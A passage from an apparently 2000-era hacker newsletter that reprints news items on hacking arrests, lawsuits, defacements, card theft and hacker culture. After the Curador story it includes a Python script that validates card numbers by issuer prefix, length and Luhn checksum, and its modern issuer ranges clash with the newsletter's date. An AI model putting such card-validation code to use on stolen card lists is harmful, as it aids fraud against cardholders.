The Navy's announcement that it is arming 2,000 ship-based officers with Palm V computers would seem, at first glance, to be a sound business decision, and proof that the Pentagon can indeed buy "off the shelf" products to the benefit of the taxpayer. The purchase is touted as the largest government buy ever of hand-held devices. But is it an investment in productivity, or a faddish move that has no place in the military arena?

"It's one of the neatest things I've ever seen," Lt. Jeff Keenan told the Associated Press. Keenan is a combat systems officer aboard the Norfolk-based destroyer USS Laboon. "I used to be one of those people who carried around a big date book all the time, and I'd misplace it plenty of times, particularly when you'd put it down to climb a ladder," Keenan said.

Don't burn your notebook just yet Jeff.
Though his Palm V packs the equivalent of message center, walkie-talkie and clipboard, you can't get it wet.

Plug and Play

Laptop computers, pagers, and hand-held devices are sprouting like weeds in the military. While many are truly purchases direct from civilian vendors, others are made to order for the wear and tear of the battlefield: waterproof, mud-proof, shock-resistant, anti-glare, and electromagnetic pulse surviving. These computers--Mini-Python, the M-30, Condor, FALCon, and Warlord Notebook--could almost be weapons given their ingenious names. Better able to survive the rigors of combat, they are much more expensive than either the Palm V or any high-end commercial laptop.

"A Palm Pilot is five ounces of dead weight in a firefight," says one military technology expert.

For the battlefield, the Army's Force XXI experiment is testing dozens of laptops and helmet and body-mounted computers (called "appliques") to link soldiers, officers, and equipment. The Navy is not without its own sea-going technology. One company has produced a $30,000 laptop approved for use on the decks of ships because it can sustain sea spray, intense sunlight and the extreme electromagnetic interference from shipboard radar.

Is this indeed "a battlefield bristling with leap-ahead technology," as former Secretary of Defense William Perry described the Army's digitization effort a few years back? Or is it the cyber equivalent of the $600 toilet seat?

Solutions and Problems

"Adolescence," is how Martin Libicki, an information technology expert at the Rand Corporation, calls the current state of electronic offerings. Libicki sees a technology harvest that will eventually reap true military benefits, but for now, he says: "If you are going to be an adult, you've got to go through it, zits and all."

Libicki has been worrying about ways to ensure that if soldiers are ever captured with their gizmos, systems will not be compromised.
"I'm worried about the guy who finds himself on the wrong side of an AK-47," he says. If the enemy were to gain access to the American tactical picture through a hand-held device or laptop, they could learn gaps in intelligence and "blue" (i.e., U.S. military) vulnerabilities.

Thus Libicki has developed some ideas to ensure network security for the inherently vulnerable battlefield systems. There is his "GPS lock-out" idea, a $200 module that could be added to hand-held devices to incorporate a global positioning satellite system. If the device is reported behind enemy lines, the module assumes it has been captured and shuts the device down awaiting resynchronization.

Then there is "dual password," which would allow a prisoner of war to key in a fake password to unlock his laptop for enemy interrogators. But the back-up password would bring up false data on the screen that would seem plausible. It would also send a signal to the mother ship that the unit has been lost.

Libicki has even conceived of an artificial intelligence program that could monitor keystrokes and thus stress to determine that a machine is still functioning under normal circumstances.

Adding without a Calculator

Though Libicki is palpably excited by his engineering challenges, he also asks some pointed questions. Does any soldier who has the potential to be captured really need a laptop? In a world where you can see the enemy from far away, do soldiers even need to close in on the enemy? Are we just building the systems for "a high-tech Gettysburg," Libicki asks? "The only time you want to get in and amongst the enemy is when there is no choice," he says.

Laptop computers that can survive a nuclear war? Notebooks that can operate on the front lines? Hand-held devices on enclosed ships and submarines? Obviously there is potential for excess here.

Beyond the question of waste though, there is the matter of practicality.
Proliferation of personal devices ensures better communication, record keeping, and access to information. But when systems fail, will military people still know the skills to use the old grease pencil? I for one have been writing with a word processor for almost 20 years, and frankly I've lost my ability to write anything beyond a grocery list in long hand.

Isn't war too important to be left to the laptop?

Contact William M. Arkin at william_arkin@washingtonpost.com

ISN is sponsored by Security-Focus.COM

@HWA

"Why is a mouse when it spins?" - Dr Who

229.0 ISN:Computer expert accused of hacking
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: darek.milewski@pl.pwcglobal.com

FBI Computer Expert Accused of Hacking

Henry K. Lee, Chronicle Staff Writer
Friday, March 24, 2000
©2000 San Francisco Chronicle

URL: http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL

Max Ray Butler seemed to be at the top of his game.

For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet. Butler, also known as Max Vision, was also a self-described ``ethical hacker'' from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it.

But Butler's cyber activity went too far, federal authorities say.

Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center.
Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment.

The indictment, handed down March 15, said Butler caused ``reckless damage'' as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara-based Internet service provider.

The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information.

``Sources are often very close to criminal activity, and sometimes they cross the line,'' said Special Agent George Grotz, an FBI spokesman in San Francisco.

Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency.

Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request.

A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day.

Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property. He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant.
An FBI search warrant affidavit said Butler was ``well known'' to squad members and ``has provided useful and timely information on computer crimes in the past.''

In 1997, Butler started a company known as Max Vision in Mountain View, specializing in ``penetration testing'' and ``ethical hacking'' procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site.

``Our client penetration rate is currently 100 percent,'' the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service.

By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter.

It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed.

Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions.

Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but ``not totally surprising.'' Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxson had filed about the invasions, Paxson said.
ISN is sponsored by Security-Focus.COM

@HWA

230.0 ISN:Disney and Miramax Sued for 'Hacking'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Nelson Murilo

[http://biz.yahoo.com/bw/000329/ca_bartko__1.html]

Wednesday March 29, 8:09 am Eastern Time

Company Press Release

Disney and Miramax Sued for 'Hacking' Parts of 'The Fugitive Game' Allegedly Stolen For New Movie

SAN FRANCISCO--(BUSINESS WIRE)--March 29, 2000--The Walt Disney Company and its Miramax division have made a computer hacker movie that ``hacked'' the author's book without paying or giving credit to the writer, according to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law firm representing best-selling author Jonathan Littman.

Littman's suit alleges that the Disney/Miramax/Dimension Films production of the movie Takedown, which premiered earlier this month in 29 theatres in Paris, France, was based in large part on lifted segments of Littman's book, The Fugitive Game. Littman's book, published in 1996, is based on the celebrated capture of computer hacker Kevin Mitnick, who was billed at the time as the world's most notorious and dangerous ``cyberterrorist.''

``Jonathan Littman carefully researched the reality of the computer hacker underworld,'' said his lawyer Bill Edlund. ``His book articulated and supported his view that Kevin Mitnick was not the premeditated, greedy and destructive criminal portrayed by some of the media. Readers and critics received Littman's The Fugitive Game as a more in-depth presentation and entertaining expose of the flawed Mitnick prosecution than the overblown, self-interested media hype.''

The Fugitive Game shows Mitnick to be not a terrorist, but a computer hacker, in part a misguided victim of a government entrapment effort that used a sleazy informant to lure Mitnick into hacking. A key element of Littman's book is his examination of the media hype spurred in New York Times articles by reporter John Markoff about the Mitnick story.
Littman also questions Markoff's presentation of Tsutomu Shimomura, a computer security specialist who used hacking techniques similar to Mitnick's to trace Mitnick to his hideout in North Carolina. Shimomura and Markoff wrote their version of these events in their book Takedown, released at the same time as Littman's book. The book is based on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's arrest in February of 1995.

The Disney organization purchased the book and movie rights to Takedown and have now released their movie version, hiring a cast that included lead actor Skeet Ulrich and screenwriters led by John Danza.

``The screenwriter could not shape the story told in the book Takedown into a workable script,'' said Edlund. ``Once the movie project began to flounder, Danza and other screenwriters lifted most of the first part of Littman's The Fugitive Game for the storyline and start of the movie Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza. In the e-mails, the screenwriter admits that it was 'unfortunate' that Disney did not option the rights to the book The Fugitive Game to make the movie Takedown. Danza goes on to describe his desire to use Littman's insider information and parts of Littman's book in order to try and salvage the movie project.''

The complaint presents a detailed comparison between Littman's book and the final shooting script for the movie Takedown, allegedly illustrating repeated and compelling similarities between the two. According to the allegations, the film Takedown and The Fugitive Game both open with a scene in a strip club frequented by a government informer who reveals to Mitnick information about ``SAS'' -- a secret Pacific Bell phone-tapping system that Mitnick subsequently breaks into and uses.
Littman's lawsuit also contends that various themes and interpretations from his book that are absent from the book Takedown appear in the movie version of Takedown, including the government informer and entrapment of Mitnick, and the pressure on the government to capture Mitnick created by exaggerated media hype.

Littman seeks to prevent Disney, Miramax and the other defendants from continuing to violate his copyrights by distributing the movie and to recover his damages and the wrongful profits that defendants obtained from the alleged theft of his work. Littman's lawyers say that the Disney-Miramax plagiarism tainted Littman's work by patching it into their motion picture. Because of this, he is also asking for damages that he claims resulted from opportunities he lost, including the opportunity for involvement with other movie projects based on The Fugitive Game.

ISN is sponsored by Security-Focus.COM

@HWA

231.0 ISN:Hacker posts own version of Gore's speech online
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This might be the most pheared 'Dilbert Cubicle Gang' we've been hearing rumours about lately .. watch for them - Ed

http://www.jsonline.com/news/gen/mar00/1muhack29032800.asp

By Stanley A. Miller II of the Journal Sentinel staff
Last Updated: March 28, 2000

A hacker cracked into Marquette University's Web site early Tuesday, replacing the school's home page with a false front concerning Al Gore's speech at the college.

The fake Web page posted false quotes about the vice president's address to the university Monday, claiming among other things that Gore said he plans to "rid this country of anyone who might question my motives, starting with deporting all Christians."

John Hopkins, vice president for communications at Marquette University, said the school's information technology staff detected attempts to break into the network Monday morning and disconnected the college's link to the Internet so they could deal with the attacks.
The school's link was restored around 5 p.m. Monday, and sometime between then and 1 a.m. Tuesday, a hacker broke in and replaced the school's Web page. Marquette's Web page was back to normal by around 1:30 a.m. Tuesday.

"Our IT people are working through this and figuring out what happened," Hopkins said. The fake home page "was up for a relatively limited period of time, and that time was early in the morning. I don't think very many people saw it."

Brian Manganello, an FBI special agent, said Marquette officials contacted them about the attack, but he declined to comment further. "We were informed that external attempts were made to compromise their computer networks," he said. "We're investigating the matter."

John Gapinski, chief operating officer for Sun Tzu Security Ltd., a technology security company in Milwaukee, said that if the hacker got administrative access to the school's network servers, the college could develop all kinds of problems. The computer intruder may have stashed viruses or other malignant programs for later use on the school's computers, he said.

"It would be prudent for them to audit their systems," he said. "You can't necessarily trust anything now."

ISN is sponsored by Security-Focus.COM

@HWA

232.0 ISN:Bennett leads cyber defense
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MY mother makes me wear these clothes.

http://deseretnews.com/dn/view/0,1249,155013410,00.html?

Utah senator fears U.S. will be attacked by computer hackers

By Lee Davidson
Deseret News Washington correspondent

WASHINGTON - Sen.
Bob Bennett was appointed Monday to head a new Senate group designed to be a central clearing house for information on how to combat cyber-attacks.

That comes after Bennett, R-Utah, said last week that he fears the next world war will not be fought with tanks and missiles, but by enemy hackers attacking the nation's computers to crash everything from the nation's utilities to its banking.

Bennett also headed a similar committee that oversaw combating the Year 2000 computer glitch. His new Critical Infrastructure Protection Working Group emerges largely to address threats warned about by the earlier Y2K committee.

Senate Majority Leader Trent Lott, R-Miss., said he formed the group and named Bennett to head it because "recent hacker attacks on major e-commerce and government Web sites demonstrate the importance of information security."

Bennett said, "The interconnectivity and advanced capabilities of U.S. computer systems makes the United States more vulnerable to cyber-attacks than any other nation in the world. Such attacks could bring the U.S. economy to its knees."

He added, "The CIP Working Group will serve as a central repository for this information and coordinate efforts to increase national awareness."

Also appointed to the group were senators who chair regular committees that share some jurisdiction over the problem including Judiciary Committee Chairman Orrin Hatch, R-Utah. Others include senators who chair the Banking, Commerce, Foreign Relations, Commerce, Energy, Intelligence, Appropriations, Environmental, Governmental Affairs and Armed Services committees, plus a few additional senators.

Just last week, Bennett told a symposium on cyber-security that lessons learned from fighting Y2K problems showed him how vulnerable America is to an attack via computer hacking.

"The most vulnerable country in the world to this kind of attack is the United States of America because we have the most advanced capabilities," he said.
Bennett added that because computer systems are now so interconnected, "a cyber-attack one place can bring down services in all the other places in the world."

He said the major threat would be if "a possible major state . . . would develop the resources for a concentrated, continuing and sophisticated attack over time" via computer hacking.

Bennett added, "In my opinion, the next war will be this target rather than the traditional" weapons of war.

ISN is sponsored by Security-Focus.COM

@HWA

233.0 ISN:Hackers rue blurred line between curiosity, vandalism
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I didn't write it folks, dictionaries are cheap these days aren't they? - Ed

http://www.techserver.com/noframes/story/0,2294,500185952-500248285-501250243-0,00.html

By HARRY BRUINIUS, The Christian Science Monitor

NEW YORK (March 28, 2000 2:20 a.m. EST http://www.nandotimes.com) - When Simple Nomad was younger, one of his favorite pastimes was worming his way into phone companies' computer systems. That was more than 10 years ago, before words like "Internet" and "hacker" were key words in the cultural lexicon - and before it was against the law.

"I liked to take things apart and see how they worked," he says. "In that way, I'm considered 'old school.'"

Getting around a computer system's security and exploring its technological nuance is part of the thrill of the pseudonymous world of the hacker underground, a relatively young cyberspace culture where computer programmers like Simple Nomad are driven to demonstrate their own technological skills.
For many, the term "hacker" conjures up images of a precocious troublemaker smirking as he toys with the technologically challenged. Indeed, sometimes what the hacker underground sees as exploring, companies call trespassing.

But hackers see a difference between their love of exploration and computer showmanship and recent attempts to shut down Web sites and steal credit-card information. They see themselves as pioneers, ones who are helping computer culture and science evolve - as opposed to the thieving (and amateur) tactics of those they derisively call "crackers."

But as the Internet evolves into a giant superstore, the lines between black and white are blurring further.

The hacking underground has a libertarian ethos that places a high value on the free flow of information. As a result, hackers often post techniques that can be used to crack system security. They argue that unauthorized hacks into systems are the only way to allow security techniques - as well as technology - to fully evolve.

"I'll be the first to admit there are a lot of gray areas," says Simple Nomad, who runs Nomad Mobile Research Centre, a Web site that provides information on the security flaws in computer systems. "I've written tools that I know can be used for people to test their system, but I also know someone can turn around and use the same tools to break into a system."

In the mid 1990s, as many in the Internet industry began clamoring for ways to protect against these intrusions, Congress passed legislation that made hacking a crime. Last week, Max Vision, the hacking alias of Max Ray Butler, was held on $100,000 bail after being indicted for breaking into government systems including NASA and the Department of Defense.

The hacker community, however, bristles at being lumped with acts like last month's "denial of service" attacks against Internet behemoths like Yahoo! and eBay, attacks that lacked the technological sophistication they value.
Many have tried to distinguish hackers from "black hats" or "crackers," who crack into systems to steal credit card information or do some kind of damage.

"A lot of the underground isn't looking at this as a major hack, or even as a genuine act of hacking," says Space Rogue, editor of Hacker News Network and a computer scientist for security consortium @stake.com.

A. Anonymous, a former "black hat" hacker who wrote the best-selling book "Maximum Security," was one of the first to give detailed information on how to crack a system's security.

"All these other security books, not one of them taught you how to break into anything," he says. "But because there are standard things you must do to secure your system, you first need to know how the attacks work."

Some of the roots of hacking come out of the "phone phreaking" of the 1970s. According to the Hackers' Hall of Fame, the hacker Cap'n Crunch became a legend when he figured out how to reproduce the tone that authorizes long-distance service with a toy whistle from a cereal box. Later, many people - mostly kids - manipulated pay-phone wires with a paper clip to get "free" long-distance.

As networks connected by phone wires began to evolve, so did the various ways to furtively plug into them. As young hackers explored the source code of systems, they began to think of ways to do it better. The result was a highly competitive community where, like playground basketball, a hacking "star" performs exploits that could become legendary.

"When something is posted, immediately that motivates some people to want to do something better," says A. Anonymous. "As a result, ideas are being exposed to an evolution at an extremely rapid pace."

Though Simple Nomad says he no longer breaks into systems, he notes that his Web site is listed as criminal on most Web-blocking software.
"Which is unfortunate," he says, "because 9 out of 10 e-mails I get is from a system administrator saying 'Thank you, I used the stuff on your site to take care of my system.'" More and more, Internet security companies are using the techniques of the hacker underground to make systems more secure. And many of the old phone phreakers and black-hat crackers are being hired. "You stick with it long enough," says A. Anonymous, "and you shed the purple hair and put on a suit and tie." *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 234.0 ISN:Curador worked as e-commerce consultant. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.internetnews.com/ec-news/article/0,2171,4_328071,00.html Before he was arrested by police in Wales last Thursday, the online credit card thief who called himself "Curador" worked as an e-commerce consultant, his former boss revealed Monday. As previously reported, an 18-year-old man in Clynderwen, Wales was arrested Thursday in connection with break-ins at nine e-commerce sites in recent weeks. Under U.K. law, Curador's name was not released by police, but the Britain's Daily Telegraph reported Saturday that Curador's real name was Raphael Gray. The true name of his accomplice, who was also arrested, was not disclosed. While he was allegedly breaking into online stores in the United States, Canada, Thailand and Great Britain, Gray was also working to develop an e-commerce strategy for Console King, a mail-order company in Narberth, Wales. According to Sam Lee, managing director, the retailer of video games and DVDs hired Gray around Christmas 1999 on the recommendation of a job recruitment firm. 
"[Gray] told us that he worked for several companies, including a subsidiary of Microsoft. And he showed us some of the work he had done, and it was pretty good. As far as we knew, he had no criminal record," said Lee. Console King paid Gray about US$6.50 to build the company an online storefront. But Lee said he fired Gray in the beginning of March after Gray began failing to show up for work. Only last week did Lee know that Gray had allegedly been involved in the online theft of about 26,000 credit cards over the course of six weeks. "We couldn't believe it. He's put my company and my staff in jeopardy. He's so stupid he doesn't know what he's done," said Lee, who added that Console King has tightened security at its site since learning of Gray's true identity. Gray has been released on bail and according to Lee has been seen on the streets of Clynderwen, which has a population of 550. FBI officials declined to comment on whether Gray had used any of the stolen card numbers to place fraudulent orders. Britain's Daily Mail newspaper quoted a detective who said police had confiscated "a pile of stuff" from the homes of Gray and his accomplice. Gray also apparently used a card stolen from an online retailer named Albion's MO to register one of the sites where he posted stolen card numbers and diatribes about e-commerce security. According to Robert Koseluk of Carmel, Indiana, he received an unauthorized charge for $198 to register and set up a site at free-creditcard.com. Gray also apparently used a card stolen from Stacy Yaple of Jacksonville, Fla., to register another site, e-crackerce.com. Lee of Console King said that Gray apparently had financial problems. Lee also said Gray would often borrow small amounts of money from him. "He never had any money. I had to lend him money for a haircut and for lunch. He came into work stinking and wore the same clothes everyday. I had to speak with him about his personal appearance and hygiene," said Lee. 
At his Web sites, Gray has argued that he broke into other sites to shame operators into improving their shoddy security. Tim Ward, owner of feelgoodfalls.com, a site that Curador hit around the end of February, said Curador has had his desired effect.

"There's some good that came out of this. We never intended to expose anybody's card numbers, but what he did resulted in us being more secure," said Ward, who revealed that his mother-in-law built the site at feelgoodfalls.com using Microsoft StoreFront. In the wake of the break-in, Ward has hired a security consulting firm to batten down the hatches.

Michael Vatis, director of the FBI's National infrastructure protection center, said Friday that regardless of a cracker's motives, breaking into a site is still a federal crime.

"If someone gains unauthorized access to a computer that's engaged in interstate or foreign commerce, that access is a federal crime, whether the state of security is poor or excellent," said Vatis.

Reuters reported Sunday that one of the credit cards that Curador had stolen belonged to none other than Microsoft Chairman Bill Gates. The report apparently was based on information gleaned from one of Curador's Web sites where he posted stolen credit card numbers.

But that site, which is mirrored here, contains information suggesting the Reuters report is inaccurate. For example, the credit card number Curador posted and claimed was Gates' has only 12 digits, and the first four do not match any algorithms used by Visa, Mastercard, Discover, American Express, or any of the other major credit card companies.

A spokesperson for the U.S. Secret Service, which investigates credit card fraud, would not comment on Curador's claims, although he did say that the card appeared to be missing numbers.
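The closing paragraph of the Curador item above rests on a structural check: a card number has a fixed length per network, an issuer prefix from a published range, and a Luhn check digit, so a 12-digit number with an unrecognised prefix can be dismissed without any cardholder lookup. The script below is an added example written for this issue, not code from the article or from any site named in it. The issuer table is a compact summary of the publicly known prefix ranges (assumed adequate for illustration, not an authoritative list), and the sample numbers are the networks' published test numbers plus a constructed 12-digit string, not real accounts. Running the same triage over a posted dump is a quick way for a responder to gauge whether a claimed leak is real card data or padding.

```python
import re

# Issuer prefix ranges and permitted lengths for the major networks.
# Assumption: a compact summary of public ranges for illustration only,
# not an authoritative or complete table.
ISSUER_RULES = [
    ("Visa", ("4",), (13, 16, 19)),
    ("Mastercard",
     tuple(str(p) for p in range(51, 56)) + tuple(str(p) for p in range(2221, 2721)),
     (16,)),
    ("American Express", ("34", "37"), (15,)),
    ("Discover", ("6011", "65") + tuple(str(p) for p in range(644, 650)), (16, 19)),
]


def luhn_ok(digits: str) -> bool:
    """Luhn check: double every second digit from the right, subtract 9 from
    any doubled value above 9, and require the sum to be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def classify_pan(raw: str) -> dict:
    """Structural triage of a claimed card number: strip separators, then check
    issuer prefix, length for that issuer, and Luhn checksum. A number that
    fails any of these cannot be a valid card, whatever the posting claims."""
    digits = re.sub(r"[\s-]", "", raw)
    result = {"digits": len(digits), "issuer": None,
              "length_ok": False, "luhn_ok": False, "plausible": False}
    if not digits.isdigit():
        return result
    for name, prefixes, lengths in ISSUER_RULES:
        if digits.startswith(prefixes):
            result["issuer"] = name
            result["length_ok"] = len(digits) in lengths
            break
    result["luhn_ok"] = luhn_ok(digits)
    result["plausible"] = (result["issuer"] is not None
                           and result["length_ok"] and result["luhn_ok"])
    return result


def triage_dump(lines) -> dict:
    """Summarise a list of claimed card numbers (e.g. a leak posting) into
    counts of structurally plausible vs. implausible entries."""
    summary = {"plausible": 0, "implausible": 0}
    for line in lines:
        key = "plausible" if classify_pan(line)["plausible"] else "implausible"
        summary[key] += 1
    return summary


# Constructed sample: published network test numbers (never real accounts)
# plus a 12-digit string with no recognised prefix, like the one in the article.
SAMPLE_DUMP = [
    "4111 1111 1111 1111",   # Visa test number
    "378282246310005",       # American Express test number
    "5555-5555-5555-4444",   # Mastercard test number
    "1234 5678 9012",        # constructed: 12 digits, unknown prefix
]

if __name__ == "__main__":
    for pan in SAMPLE_DUMP:
        print(pan, classify_pan(pan))
    print(triage_dump(SAMPLE_DUMP))
```

The check is deliberately cheap: it needs no network call and no issuer contact, which is why a newsroom or an incident responder can apply it to a posting before repeating its claims. Passing it proves nothing about whether a number is live, so it is a filter for discarding junk, not a confirmation of a breach.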
@HWA

235.0 ISN:White house official charged with spreading phone codes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html

By Gail Appleson, Law Correspondent

NEW YORK (Reuters) - A U.S. Army sergeant has been charged with giving out long distance White House telephone access code information that allowed individuals to charge some 9,400 calls worth $50,000 to the federal government, prosecutors said on Monday.

David Gilmer, who was assigned to the White House Communications Agency, was arrested late Friday in Virginia on a criminal complaint filed in Manhattan federal court that alleged the calls were made over the last few months.

The WHCA provides telephone service to Executive Branch agencies and departments including the President, Vice President, White House Senior Staff, National Security Council, U.S. Secret Service and others as directed by the White House Military Office. AT&T provides the long-distance phone service for the WHCA.

No information was immediately available on the identities of those who used the information or if Gilmer made any profits from giving it out. The White House said Gilmer is no longer attached to the Communications Agency but had no further comment on the matter.

Prosecutors said those involved in the scheme were able to use the White House code in much the same way consumers use telephone calling cards. However, in this case the WHCA was billed for the calls instead of the users.

According to court papers, individuals called a WHCA toll-free number and entered a numerical code. They then heard a dial tone and were able to make long distance calls. AT&T told investigators that about 9,400 unauthorized calls were made between about Dec. 5, 1999, and Feb. 8.
Some of these calls were made from phones in New Jersey and New York City. WHCA was billed about $50,000 for the calls.

AT&T and Bell Atlantic provided authorities with subscriber information for several of the residential and business telephone lines on which the calls were made and search warrants were obtained for those properties.

In searching one of the New Jersey properties, agents said that one individual admitted using the WHCA toll-free number and code since September 1999. The unidentified individual allegedly told authorities the information came from Gilmer. According to court papers, the individual had Gilmer's business card identifying him as an employee of the WHCA assigned to the Presidential Communications division.

On March 17 the individual consented to be taped by federal agents when that individual called Gilmer. The individual asked Gilmer for another WHCA code to avoid being billed for a long distance call. Gilmer allegedly provided the code.

The individual made a second taped call on March 22 and during the conversation Gilmer allegedly admitted giving access codes to other individuals.

@HWA

236.0 ISN:Hackers hold conference in Israel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.lasvegassun.com/sunbin/stories/tech/2000/mar/30/033000707.html

JERUSALEM (AP) [3.30.2000] -- Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention, wrapping up the two-day conference Thursday without a glitch.

The 350-strong gathering was the first of its kind since the Yahoo!
and eBay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose.

At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead.

One of the original hackers, John Draper of Fremont, Calif., said the hackers wanted to put a better face on the practice.

"A hacker is a person who is developing programs to make them better," Draper told The Associated Press. "They aren't the kind of people who break into computer systems. That's a cracker."

Draper, known by the handle "Captain Crunch," helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line.

Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane.

"There were many attempts to silence us on this," organizers said in a summary of the gathering, released on their Web site.

Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites. To compile the list, participants played "HackTheseSites" with sites offered up by Israeli companies. The site owners were confident no one could thwart them, but they were wrong.

When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28 percent of the Israeli net is vulnerable -- about the same proportion as the rest of the world, according to organizers.

Police were invited to attend the conference and even to speak, but they turned down the offer, creating the game "Spot the Fed." Participants were given the challenge of finding plainclothes policemen among them.
If a person pointed out as suspicious was in fact a security official, the official was to get an "I am the FED" T-shirt, and the spotter an "I spotted the FED" shirt. But none were found out.

Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm.

"I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work," Eitan said in a telephone interview.

Participants also got to speak to their guru -- convicted cyberbandit Kevin Mitnick -- in a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device.

Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc., Novell Inc. and Sun Microsystems Inc.

"He had a lot of sympathy in the room -- we all know not being able to touch a computer is a worse punishment than even being in jail," said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference.

--

On the Net:

Conference organizers at http://www.neora.com

John Draper's site at http://www.webcrunchers.com

Hackers' site at http://www.y2hack.com

@HWA

237.0 ISN:Old school MIT stylie "hacking" still makes news?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml

By David Abel, Globe Correspondent, 3/30/2000

CAMBRIDGE - Like shadows they scurry through the night, dressed in black, armed with head-mounted flashlights, walkie-talkies, ropes, pocketknives, lock-picking tools - and their student ID cards.

They call themselves ''hackers.'' But these Massachusetts Institute of Technology students shouldn't be confused with those who sabotage computers. They have a more lofty goal: to bypass locked doors, slide through off-limits shafts and tunnels, and explore the bowels of campus buildings.

Most Saturday nights, groups of less than a dozen students seek adventure by searching for anything from the fabled bricked-in shower to the Tomb of the Unknown Ladder.

''It's a lot like rock climbing or caving,'' said Jeremy Brown, 27, a computer science graduate student and veteran hacker. ''For us, it's about interrogating the environment, and learning from it.''

But there's another, less appealing side of hacking: the danger. Last November a student was seriously injured after falling through a roof.

Many of the hundreds of hackers are reluctant to talk about their underground pastime. They fear news reports will only push college officials to clamp down.

''You see, the more detail we give,'' Brown said, ''the more we're shooting ourselves in the foot.''

Still, hacking is anything but a secret at MIT. If they haven't done it themselves, almost any student on campus could name a friend who has. In fact, during freshman orientation week every year, upperclassmen take large groups to tour the innards of MIT's infrastructure.

But college officials insist that they don't turn a blind eye to what is known as ''roof and tunnel hacking,'' a variation or sometime precursor to another form of hacking: practical jokes.
MIT students are famous for inventive pranks that require engineering finesse and are often done to coincide with April Fools' Day, such as placing a replica of a campus police cruiser atop the school's Great Dome.

''We definitely don't encourage it,'' said Lawrence S. Bacow, chancellor of MIT. ''We lock the roofs, we alarm doors, and we have fined students when they're where they shouldn't be. It's certainly not like we say, `Here's a roof; come climb on it.' Far from it.''

